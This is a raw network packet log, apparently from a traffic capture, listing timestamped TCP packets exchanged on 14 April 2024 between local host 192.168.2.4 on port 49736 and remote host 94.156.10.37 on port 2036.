Apr 14, 2024 08:45:12.739537001 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739562035 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739566088 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739588976 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739610910 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739689112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739708900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739727020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739736080 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739746094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739763021 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739763975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739782095 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739792109 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739800930 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.739834070 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.739861012 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.952723980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.952842951 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.952882051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.952919006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.952960014 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.952997923 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.953027010 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.953037024 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.953074932 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.953116894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.953188896 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.953188896 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.953298092 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.963896990 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.963953018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.963994026 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964023113 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964035988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964075089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964103937 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964114904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964160919 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964185953 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964199066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964257956 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964267015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964308977 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964346886 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964370966 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964385033 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964422941 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964446068 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964461088 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964498997 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964523077 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964536905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964576006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964612961 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964617014 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964652061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964674950 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964690924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964729071 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964751959 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964768887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964806080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964829922 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964843988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964883089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964905977 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964921951 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964958906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.964977026 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.964998007 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965034962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965070963 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965073109 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965111971 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965132952 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965152025 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965189934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965226889 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965241909 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965265989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965289116 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965302944 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965339899 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965362072 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965378046 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965416908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965437889 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965454102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965491056 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965513945 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965533018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965570927 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965589046 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965610027 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965648890 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965672016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965686083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965723038 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965744972 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965760946 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965797901 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965821981 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.965837002 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.965910912 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966244936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966346979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966386080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966414928 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966422081 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966460943 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966491938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966499090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966537952 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966558933 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966597080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966634989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966655016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966674089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966715097 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966737032 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966753006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966792107 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966814041 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966830015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966866016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966882944 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966909885 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966947079 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.966970921 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.966984987 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967022896 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967042923 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967061043 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967099905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967135906 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967135906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967178106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967195034 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967216015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967252970 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967272997 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967291117 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967329025 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967345953 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967367887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967405081 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967427969 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967444897 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967482090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967500925 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967519999 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967556953 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967572927 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967593908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967631102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967650890 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967669010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967705965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967725992 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967745066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967782974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967819929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967829943 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967856884 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967875957 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967897892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967935085 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.967952013 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.967974901 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.968012094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.968031883 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.968051910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.968091011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.968111992 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.968127966 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.968163967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.968187094 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.985778093 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.985833883 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.178946972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179012060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179050922 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179075003 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179091930 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179133892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179151058 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179172993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179215908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179240942 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179254055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179292917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179312944 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179406881 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179449081 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179469109 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179508924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179546118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179559946 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179584980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179626942 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179640055 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179665089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179702997 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179718018 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179740906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179776907 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179792881 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179815054 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179852962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179868937 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179891109 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179929018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.179940939 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.179966927 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180005074 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180016994 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180043936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180079937 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180095911 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180118084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180155993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180166960 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180196047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180247068 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180253983 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180289984 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180327892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180344105 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180366039 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180402994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180418015 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180440903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180476904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180501938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180515051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180551052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180562973 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180593967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180629969 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180643082 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180669069 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180711031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180723906 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180749893 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180787086 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180799961 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180824995 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180864096 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180875063 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180902004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180938959 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.180952072 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.180979013 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.181013107 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.181030035 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.181051016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.181094885 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.181106091 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.191833019 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.191899061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.191904068 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.191939116 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.191977978 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.191987991 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192018032 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192056894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192076921 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192096949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192137003 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192154884 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192178011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192236900 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192215919 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192289114 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192327976 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192348957 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192365885 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192404032 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192418098 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192445040 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192481995 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192497015 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192522049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192562103 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192576885 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192599058 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192636967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192651033 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192673922 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192713022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192728996 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192750931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192787886 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192804098 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192826986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192866087 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192879915 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.192903042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192945004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.192959070 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.193885088 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.193950891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.193954945 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.193991899 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194031000 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194045067 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194072962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194112062 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194128036 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194159031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194200993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194216013 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194241047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194281101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194294930 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194319010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194356918 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194376945 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194399118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194441080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194456100 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194479942 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194518089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:13.194546938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:13.194555998 CEST	2036	49736	94.156.10.37	192.168.2.4
